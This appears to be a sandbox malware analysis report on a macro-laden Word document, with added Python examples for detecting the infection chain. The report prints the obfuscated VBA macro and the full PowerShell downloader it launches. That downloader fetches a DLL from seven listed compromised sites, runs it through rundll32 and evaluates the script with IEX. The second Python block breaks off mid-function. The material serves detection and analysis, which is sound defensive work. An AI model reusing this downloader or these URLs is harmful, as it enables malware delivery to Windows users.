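The two hosts above are the whole download chain observed in this run: the PowerShell stage asked primtalent.com for /wp-admin/9yt1u/ and got a 404, then just under five seconds later asked huskysb.com for /wordpress/6f0qIQlWPaYDfa/ and was redirected to the hosting provider's suspended-account page. Both fetches used PowerShell's default User-Agent (WindowsPowerShell/5.1.17134.1) and a directory-style URL under a WordPress path, and neither returned a payload, so no second stage executed and everything the sample would do after the downloader is unobserved here. The Python below is an added example, not part of the Joe Sandbox report: it encodes that pattern as a triage routine over proxy-style records reconstructed by hand from the HTTP Packets section that follows, classifies each attempt's outcome (404, cPanel suspension redirect, HTML page, or an actual payload) and rebuilds the URL chain with the gap between hosts. The two CONTROLS records are hypothetical and exist only to exercise the paths the report does not show.

```python
"""Triage the PowerShell download attempts in the HTTP Packets section.

Added example; not part of the Joe Sandbox report. RECORDS is constructed by
hand from the report's two HTTP sessions (process, User-Agent, URL, status,
Location header, page title). CONTROLS holds two hypothetical records that the
report does not contain: a browser visiting a WordPress admin page, and what a
still-live drop host would have returned.
"""
import re
from datetime import datetime

PS_UA = re.compile(r"\bWindowsPowerShell/\d")
# Directory-style URL under a WordPress path with a short random token, the
# shape of both requests in the report (/wp-admin/9yt1u/, /wordpress/6f0qIQlWPaYDfa/).
WP_DROP = re.compile(r"^/(wp-admin|wp-content|wp-includes|wordpress)/[A-Za-z0-9]{4,24}/$")
SUSPENDED = "/cgi-sys/suspendedpage.cgi"   # cPanel suspended-account page named in the 302

POWERSHELL = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS_DEFAULT_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1"


def rec(ts, proc, host, path, ua, status, ctype, location=None, title=None):
    return dict(ts=ts, proc=proc, host=host, path=path, ua=ua, status=status,
                ctype=ctype, location=location, title=title)


RECORDS = [  # constructed from the report's HTTP sessions
    rec("2021-11-22 13:23:07.621", POWERSHELL, "primtalent.com", "/wp-admin/9yt1u/",
        PS_DEFAULT_UA, 404, "text/html", title="404 Not Found"),
    rec("2021-11-22 13:23:12.396", POWERSHELL, "huskysb.com", "/wordpress/6f0qIQlWPaYDfa/",
        PS_DEFAULT_UA, 302, "text/html", location="http://huskysb.com" + SUSPENDED, title="302 Found"),
    rec("2021-11-22 13:23:12.656", POWERSHELL, "huskysb.com", SUSPENDED,
        PS_DEFAULT_UA, 200, "text/html", title="Account Suspended"),
]
CONTROLS = [  # hypothetical, not in the report
    rec("2021-11-22 13:25:00.000", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "intranet.example", "/wp-admin/", "Mozilla/5.0 (Windows NT 10.0) Chrome/96.0", 200, "text/html"),
    rec("2021-11-22 13:23:17.000", POWERSHELL, "live.example", "/wp-content/AbCdEf123/",
        PS_DEFAULT_UA, 200, "application/octet-stream"),
]


def is_suspicious_request(r) -> bool:
    """PowerShell's default User-Agent fetching a WordPress-style drop path.
    Either signal alone is noisy; together they match the report's pattern."""
    return bool(PS_UA.search(r["ua"]) and WP_DROP.match(r["path"]))


def outcome(r) -> str:
    """Did the fetch deliver a payload, or was the host already dead?"""
    if r["status"] == 404:
        return "dead (404)"
    if r["status"] in (301, 302) and r["location"] and r["location"].endswith(SUSPENDED):
        return "dead (account suspended)"
    if r["status"] == 200 and r["ctype"].startswith("text/html"):
        return "no payload (HTML page)"
    if r["status"] == 200:
        return "payload retrieved"
    return f"unclassified ({r['status']})"


def triage(records) -> dict:
    """Rebuild the download-URL chain in the order the downloader tried it."""
    chain, first_seen = [], {}
    for r in sorted(records, key=lambda x: x["ts"]):
        if not is_suspicious_request(r):
            continue   # the redirect target /cgi-sys/... is not itself a drop URL
        first_seen.setdefault(r["host"], datetime.fromisoformat(r["ts"]))
        chain.append({"host": r["host"], "url": f"http://{r['host']}{r['path']}",
                      "outcome": outcome(r)})
    hosts = list(first_seen)
    gaps = [(first_seen[b] - first_seen[a]).total_seconds() for a, b in zip(hosts, hosts[1:])]
    return {"chain": chain, "hosts": hosts, "seconds_between_hosts": gaps,
            "payload_retrieved": any(c["outcome"] == "payload retrieved" for c in chain)}


if __name__ == "__main__":
    for c in triage(RECORDS)["chain"]:
        print(f"{c['url']:<50} {c['outcome']}")
```

The same two-signal match translates directly into a proxy or EDR query (User-Agent contains WindowsPowerShell and path matches the WordPress drop pattern); the outcome classification is what tells you whether a hit is a blocked attempt or a host that needs to be pulled for the next stage.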

                                                                                                                                    HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49754 | 148.72.96.3 | 80 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Nov 22, 2021 13:23:07.621309042 CET | 1203 | OUT | GET /wp-admin/9yt1u/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: primtalent.com
Connection: Keep-Alive
Nov 22, 2021 13:23:07.732558012 CET | 1204 | IN | HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2021 12:23:07 GMT
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49755 | 60.248.112.145 | 80 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Nov 22, 2021 13:23:12.396229029 CET | 1205 | OUT | GET /wordpress/6f0qIQlWPaYDfa/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: huskysb.com
Connection: Keep-Alive
Nov 22, 2021 13:23:12.655504942 CET | 1206 | IN | HTTP/1.1 302 Found
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html
content-length: 683
date: Mon, 22 Nov 2021 12:23:12 GMT
server: LiteSpeed
cache-control: no-cache, no-store, must-revalidate, max-age=0
location: http://huskysb.com/cgi-sys/suspendedpage.cgi
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 32 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 
6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>
Nov 22, 2021 13:23:12.656769991 CET | 1206 | OUT | GET /cgi-sys/suspendedpage.cgi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: huskysb.com
Nov 22, 2021 13:23:13.009346008 CET | 1207 | IN | HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html
transfer-encoding: chunked
date: Mon, 22 Nov 2021 12:23:13 GMT
server: LiteSpeed
                                                                                                                                    Data Raw: 31 64 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 6f 75 6e 74 20 53 75 73 70 65 6e 64 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 75 73 65 2e 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 72 65 6c 65 61 73 65 73 2f 76 35 2e 30 2e 36 2f 63 73 73 2f 61 6c 6c 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 


                                                                                                                                    Code Manipulations

                                                                                                                                    Statistics

                                                                                                                                    CPU Usage

                                                                                                                                    Memory Usage

                                                                                                                                    High Level Behavior Distribution

                                                                                                                                    Behavior

                                                                                                                                    System Behavior

                                                                                                                                    General

                                                                                                                                    Start time:13:22:33
                                                                                                                                    Start date:22/11/2021
                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                    Imagebase:0xbb0000
                                                                                                                                    File size:1937688 bytes
                                                                                                                                    MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:13:22:39
                                                                                                                                    Start date:22/11/2021
                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
                                                                                                                                    Imagebase:0x11d0000
                                                                                                                                    File size:232960 bytes
                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:13:22:40
                                                                                                                                    Start date:22/11/2021
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff724c50000
                                                                                                                                    File size:625664 bytes
                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:13:22:41
                                                                                                                                    Start date:22/11/2021
                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
                                                                                                                                    Imagebase:0x180000
                                                                                                                                    File size:430592 bytes
                                                                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:13:23:13
                                                                                                                                    Start date:22/11/2021
                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\windows\syswow64\rundll32.exe" c:\programdata\646848703.dll,f1349786762
                                                                                                                                    Imagebase:0x1070000
                                                                                                                                    File size:61952 bytes
                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Disassembly

                                                                                                                                    Code Analysis

                                                                                                                                    Call Graph

                                                                                                                                    Graph

                                                                                                                                    Module: cvbku3gakuisdgfilu3gblaw

Declaration

Line | Content
1 | Attribute VB_Name = "cvbku3gakuisdgfilu3gblaw"
2 | Attribute VB_Base = "1Normal.ThisDocument"
3 | Attribute VB_GlobalNameSpace = False
4 | Attribute VB_Creatable = False
5 | Attribute VB_PredeclaredId = True
6 | Attribute VB_Exposed = True
7 | Attribute VB_TemplateDerived = True
8 | Attribute VB_Customizable = True

Executed Functions

APIs | Meta Information

Run:

                                                                                                                                    Object.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0) -> 0

CreateObject:
CreateObject("RDS.DataSpace")
  Part of subcall function goh4iahwodegiyna89deyfni@cvbku3gakuisdgfilu3gblaw: Replace
  Part of subcall function goh4iahwodegiyna89deyfni@cvbku3gakuisdgfilu3gblaw: MsgBox
  Part of subcall function goh4iahwodegiyna89deyfni@cvbku3gakuisdgfilu3gblaw: Replace
  Part of subcall function goh4iahwodegiyna89deyfni@cvbku3gakuisdgfilu3gblaw: MsgBox

Replace:
Replace(,",","")
Strings | Decrypted Strings
                                                                                                                                    """"
                                                                                                                                    "RI"
                                                                                                                                    "WRIsRIcRIriRIpt.RISRIheRIlRIl"
                                                                                                                                    "elf"
                                                                                                                                    "fA"
                                                                                                                                    "fARDfAS.fADafAtafASpfAacfAe"
                                                                                                                                    """"
                                                                                                                                    "RI"
                                                                                                                                    "WRIsRIcRIriRIpt.RISRIheRIlRIl"
                                                                                                                                    """"
                                                                                                                                    "RI"
                                                                                                                                    "WRIsRIcRIriRIpt.RISRIheRIlRIl"
                                                                                                                                    "elf"
                                                                                                                                    "fA"
                                                                                                                                    "fARDfAS.fADafAtafASpfAacfAe"
                                                                                                                                    "fA"
                                                                                                                                    "fARDfAS.fADafAtafASpfAacfAe"
                                                                                                                                    "elf"
                                                                                                                                    "elf"
                                                                                                                                    """"
                                                                                                                                    ","
                                                                                                                                    """"
                                                                                                                                    ","
Line | Instruction | Meta Information
69 | Sub fjow3efyw98efhasdokfhlnkvawofh3(nart4kuagiuagsaedr54 as Long, bvagh4iauhoshetret as Long, fbhqwieusiyeoiwugeig as String) |
69 | Dim sdgbvku3giqugfi2, fhokl34rhyw5uwegea, hkqwfsadesf as String | executed
70 | Dim s1, ra as String |
70 | Dim bfik3uvgikuds as Double |
71 | Dim dvfghwkuibisdbgfiw as Object |
72 | Dim d, R as Double |
73 | For bkwefiusdif = 1 To 10 |
74 | If bkwefiusdif = 7 Then |
75 | dvfghwkuibisdbgfiw.CreateObject(goh4iahwodegiyna89deyfni("WRIsRIcRIriRIpt.RISRIheRIlRIl", "RI"), "").Run fhokl34rhyw5uwegea, 0 | (meta information follows)

                                                                                                                                    Object.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0) -> 0
   executed
76 | Else |
77 | If bkwefiusdif = 3 Then |
78 | Set dvfghwkuibisdbgfiw = CreateObject(goh4iahwodegiyna89deyfni("fARDfAS.fADafAtafASpfAacfAe", "fA")) | CreateObject("RDS.DataSpace"); executed
79 | Dim fs as Integer |
79 | If bfik3uvgikuds < 0.021335 And bfik3uvgikuds > - 0.0134542765 Then |
79 | fhokl34rhyw5uwegea = goh4iahwodegiyna89deyfni(fbhqwieusiyeoiwugeig, "elf") |
79 | Endif |

                                                                                                                                    80

                                                                                                                                    Endif

                                                                                                                                    81

                                                                                                                                    Endif

                                                                                                                                    82

                                                                                                                                    Next

                                                                                                                                    83

                                                                                                                                    If d <> 0.123456 Then

                                                                                                                                    84

                                                                                                                                    ra = Replace(s1, ",", "")

                                                                                                                                    Replace(,",","")

                                                                                                                                    executed
                                                                                                                                    85

                                                                                                                                    Endif

                                                                                                                                    86

                                                                                                                                    End Sub
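The process chain the sandbox recorded at line 75 (Word spawns cmd.exe /c start /B powershell, the script fetches a DLL with Invoke-WebRequest into c:\programdata\<Get-Random>.dll, then starts c:\windows\syswow64\rundll32.exe on it with an export named "f" + Get-Random, and the whole thing is evaluated with IEX) is what a detection engineer would key on rather than the URLs, which rotate per campaign. The Python below is an added example, not part of the report or of the sample: it runs three checks derived from that command line over constructed process-creation events. Field names are loosely modelled on Sysmon Event ID 1, the PIDs, the DLL name 1534812077.dll and the export f918273645 are made up to stand in for the two Get-Random values, and the PowerShell body is the recovered one shortened to two of its seven URLs.

```python
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
LOADERS = {"rundll32.exe", "regsvr32.exe"}

# Indicators taken from the decoded command line: in-memory evaluation (IEX $dfkj),
# a web download (Invoke-WebRequest ... -OutFile) and rundll32 loading a DLL dropped
# under c:\programdata with an export named "f" + Get-Random.
IEX_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
DOWNLOAD_RE = re.compile(r"\b(invoke-webrequest|iwr|downloadfile|downloadstring|start-bitstransfer)\b", re.I)
PROGRAMDATA_DLL_RE = re.compile(r"\\programdata\\[^\\,\"]+\.dll\s*,\s*\w+", re.I)

# PowerShell body as the sandbox recovered it, shortened to two of the seven URLs.
PS_SCRIPT = r'$dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj'

# Constructed process-creation events (fields loosely modelled on Sysmon Event ID 1).
# PIDs, the DLL name and the export suffix are invented stand-ins for the Get-Random values.
EVENTS = [
    {"pid": 1000, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 2000, "ppid": 1000, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\sample.doc"'},
    {"pid": 2100, "ppid": 2000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c start /B powershell " + PS_SCRIPT},
    {"pid": 2200, "ppid": 2100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell " + PS_SCRIPT},
    {"pid": 2300, "ppid": 2200, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"c:\windows\syswow64\rundll32.exe c:\programdata\1534812077.dll,f918273645"},
    # Benign activity that must not fire: Word's print helper, an admin download
    # without IEX, and a stock rundll32 control-panel invocation.
    {"pid": 2500, "ppid": 2000, "image": r"C:\Windows\splwow64.exe", "cmdline": "splwow64.exe 12288"},
    {"pid": 3000, "ppid": 1000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -NoProfile -Command "Invoke-WebRequest -Uri https://intranet.example/report.csv -OutFile C:\reports\r.csv"'},
    {"pid": 3100, "ppid": 1000, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
]


def image_name(path: str) -> str:
    """Basename of a Windows image path, lower-cased (os.path would not split it on POSIX)."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestors(pid: int, by_pid: dict):
    """Yield image names of parent, grandparent, ... until the chain leaves the event set."""
    seen = {pid}
    ev = by_pid.get(pid)
    while ev is not None and ev["ppid"] in by_pid and ev["ppid"] not in seen:
        ev = by_pid[ev["ppid"]]
        seen.add(ev["pid"])
        yield image_name(ev["image"])


def detect(events) -> set:
    """Return {(pid, rule_name)} for every event matching one stage of the chain."""
    by_pid = {e["pid"]: e for e in events}
    hits = set()
    for e in events:
        img = image_name(e["image"])
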